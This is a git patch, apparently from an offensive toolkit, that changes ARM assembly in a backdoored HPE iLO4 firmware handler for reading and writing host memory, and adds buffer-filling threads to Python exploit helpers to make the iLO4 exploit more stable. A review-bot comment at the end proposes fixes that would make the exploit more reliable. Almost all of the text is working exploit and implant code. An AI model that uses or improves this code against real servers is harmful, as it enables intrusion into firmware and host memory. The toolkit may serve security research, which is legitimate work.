From a3e4b312a89adad2ad9833dff79f5d11703227eb Mon Sep 17 00:00:00 2001
From: 0xf4b
Date: Wed, 19 Dec 2018 16:38:36 +0100
Subject: [PATCH] - Fix stability issues in the backdoored firmware - Make exploits great again! Stability++
---
 scripts/iLO4/GET_handler.S | 83 ++++++++++++--------
 scripts/iLO4/exploits/exploit_check_flash.py | 2 +
 scripts/iLO4/exploits/exploit_helpers.py | 53 ++++++++++++-
 3 files changed, 104 insertions(+), 34 deletions(-)

diff --git a/scripts/iLO4/GET_handler.S b/scripts/iLO4/GET_handler.S
index 893f7b0..0c5427b 100644
--- a/scripts/iLO4/GET_handler.S
+++ b/scripts/iLO4/GET_handler.S
@@ -11,8 +11,8 @@ start:
  MOV R0, SP
  BL bzero
- MOV R0, #8
- BL memmap
+ MOV R0, #8
+ BL memmap
  MOV R0, R7
  LDR R10, get_query_string
@@ -21,7 +21,7 @@ start:
  CMP R0, #0
  BEQ error_400
- MOV R2, #0x100
+ MOV R2, #0x1000
  MOV R1, R0
  BL get_storage
  ADD R0, R0, #0x2000
@@ -463,6 +463,8 @@ check_wmem_size:
  LDR R1, [SP, #0xF0]
  CMP R1, #0
  BEQ err_wmem
+ CMP R1, #0xffffffff
+ BEQ err_wmem
 do_wmem:
  LDR R3, [SP, #0xF0]
@@ -553,24 +555,24 @@ dmp_host:
  MOV R0, R6
  BL go_200_headers
- LDR R0, [SP, #0x10]
- MOV R2, #0
- MOV R1, R2
- BL WaitForSemaphore
+ LDR R0, [SP, #0x10]
+ MOV R2, #0
+ MOV R1, R2
+ BL WaitForSemaphore
- MOV R0, #2
- STR R0, [SP, #0x14]
+ MOV R0, #2
+ STR R0, [SP, #0x14]
 dmp_host_loop:
  MOV R3, R8, LSL #8
- ORR R2, R3, R7, LSR #24
- LDRB R3, [SP, #0x14]
+ ORR R2, R3, R7, LSR #24
+ LDRB R3, [SP, #0x14]
  BIC R2, R2, #0xFF000000
- ORR R2, R2, R3, LSL #24
- BL get_pcireg
- STR R2, [R0]
- BIC R2, R7, #0xFF000000
- ADD R0, R2, #0x81000000
+ ORR R2, R2, R3, LSL #24
+ BL get_pcireg
+ STR R2, [R0]
+ BIC R2, R7, #0xFF000000
+ ADD R0, R2, #0x81000000
  STR R0, [SP, #0xC]
@@ -595,8 +597,14 @@ dmp_host_loop:
  B dmp_host_loop
 dmp_host_end:
- LDR R0, [SP, #0x10]
- BL ReleaseSemaphore
+ LDR R0, [SP, #0x10]
+ BL ReleaseSemaphore
+
+ LDR R0, [SP, #0x10]
+ BL ReleaseResource
+
+ LDR R0, [SP]
+ BL ReleaseResource
  MOV R0, R6
  BL go_200_close
@@ -637,23 +645,23 @@ wmem_host:
  ADD R0, SP, #0x10
  BL RequestResource
- LDR R0, [SP, #0x10]
- MOV R2, #0
- MOV R1, R2
- BL WaitForSemaphore
+ LDR R0, [SP, #0x10]
+ MOV R2, #0
+ MOV R1, R2
+ BL WaitForSemaphore
- MOV R0, #2
- STR R0, [SP, #0x14]
+ MOV R0, #2
+ STR R0, [SP, #0x14]
  MOV R3, R8, LSL #8
- ORR R2, R3, R7, LSR #24
- LDRB R3, [SP, #0x14]
+ ORR R2, R3, R7, LSR #24
+ LDRB R3, [SP, #0x14]
  BIC R2, R2, #0xFF000000
- ORR R2, R2, R3, LSL #24
- BL get_pcireg
- STR R2, [R0]
- BIC R2, R7, #0xFF000000
- ADD R0, R2, #0x81000000
+ ORR R2, R2, R3, LSL #24
+ BL get_pcireg
+ STR R2, [R0]
+ BIC R2, R7, #0xFF000000
+ ADD R0, R2, #0x81000000
  STR R0, [SP, #0xC]
@@ -665,7 +673,13 @@ wmem_host:
  BL CopyToMemoryRegion
  LDR R0, [SP, #0x10]
- BL ReleaseSemaphore
+ BL ReleaseSemaphore
+
+ LDR R0, [SP, #0x10]
+ BL ReleaseResource
+
+ LDR R0, [SP]
+ BL ReleaseResource
  MOV R0, R6
  BL go_200_headers
@@ -710,6 +724,11 @@ RequestResource:
  BX R10
 RequestResource_fn: .word 0x17A3948
+ReleaseResource:
+ LDR R10, ReleaseResource_fn
+ BX R10
+ReleaseResource_fn: .word 0x17808FC
+
 WaitForSemaphore:
  LDR R10, WaitForSemaphore_fn
  BX R10
diff --git a/scripts/iLO4/exploits/exploit_check_flash.py b/scripts/iLO4/exploits/exploit_check_flash.py
index a68e840..2ff07c4 100644
--- a/scripts/iLO4/exploits/exploit_check_flash.py
+++ b/scripts/iLO4/exploits/exploit_check_flash.py
@@ -78,7 +78,9 @@ if version != ilo_version.replace(".",""):
     print "[-] Bad version specified in command line"
+ths = fill_threads(sys.argv[1], sc_headers + cookies_headers + vtable_headers)
 send_exploit(s, sc_headers + cookies_headers + vtable_headers, o)
+stop_threads(ths)
 btmp = ""
 out = ""
diff --git a/scripts/iLO4/exploits/exploit_helpers.py b/scripts/iLO4/exploits/exploit_helpers.py
index ffd8f73..3a7050c 100644
--- a/scripts/iLO4/exploits/exploit_helpers.py
+++ b/scripts/iLO4/exploits/exploit_helpers.py
@@ -8,6 +8,9 @@ from keystone import *
 from exploit_offsets import *
+import threading
+from time import sleep
+
 sc_offset = 0x1000
 vtable_offset = 0x100
@@ -27,11 +30,11 @@ def get_version_info(version):
     return EXP_OFFSETS[version]
 def ssl_connector(addr, port):
-    print "[*] Connecting to %s..." % sys.argv[1]
+    print "[*] Connecting to %s..." % addr
     sraw = socket.socket()
     s = ssl.wrap_socket(sraw)
-    s.connect((sys.argv[1], 443))
+    s.connect((addr, port))
     print "[+] Connected"
     return s
@@ -122,6 +125,52 @@ def get_xml_version(s, headers):
     print "[*] Found iLO version %s" % ilo_version
     return ilo_version
+def fill_threads(host, headers):
+    th = []
+    for i in xrange(3):
+        th.append(fillingThread(host, headers))
+    for i in xrange(3):
+        th[i].start()
+    while not all(th[i].sentflag for i in xrange(3)):
+        sleep(0.1)
+    return th
+
+def stop_threads(ths):
+    for th in ths:
+        th.stop()
+
+class fillingThread(threading.Thread):
+    def __init__(self, host, headers):
+        threading.Thread.__init__(self)
+        self.stopflag = False
+        try:
+            self.s = ssl_connector(host, 443)
+        except:
+            self.s = None
+        self.headers = headers
+        self.sentflag = False
+
+    def run(self):
+        if self.s is None:
+            return
+        print "[*] Filling buffer..."
+
+        self.buf = "GET / HTTP/1.1\r\n"
+        self.buf += "Host: ilo\r\n"
+
+        self.buf += self.headers
+
+        self.s.send(self.buf)
+        self.sentflag = True
+
+        while not self.stopflag:
+            sleep(0.1)
+        print "[+] Releasing threads"
+        self.s.close()
+
+    def stop(self):
+        self.stopflag = True
+
 def send_exploit(s, headers, o):
     print "[*] Preparing request 2..."
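Review bot: `fill_threads` busy-waits forever when any `fillingThread` failed to connect: `__init__` swallows every exception with a bare `except:` and leaves `self.s = None`, `run` then returns before `sentflag` is ever set, and `while not all(th[i].sentflag for i in xrange(3))` has no other exit. Narrow the handler to `except (socket.error, ssl.SSLError):`, and have `fill_threads` check `th[i].s is None` after construction and raise instead of spinning (or bound the wait with a deadline). The threads are also non-daemon and never joined, so an exception raised between `fill_threads` and `stop_threads` in the caller leaves the process hanging on exit; `self.setDaemon(True)` in `__init__` or a `th.join()` in `stop_threads` would bound that. `fill_threads` also hard-codes port 443 in `ssl_connector(host, 443)` while `ssl_connector` now takes a `port` parameter, so the generalization made in the same commit is not used here.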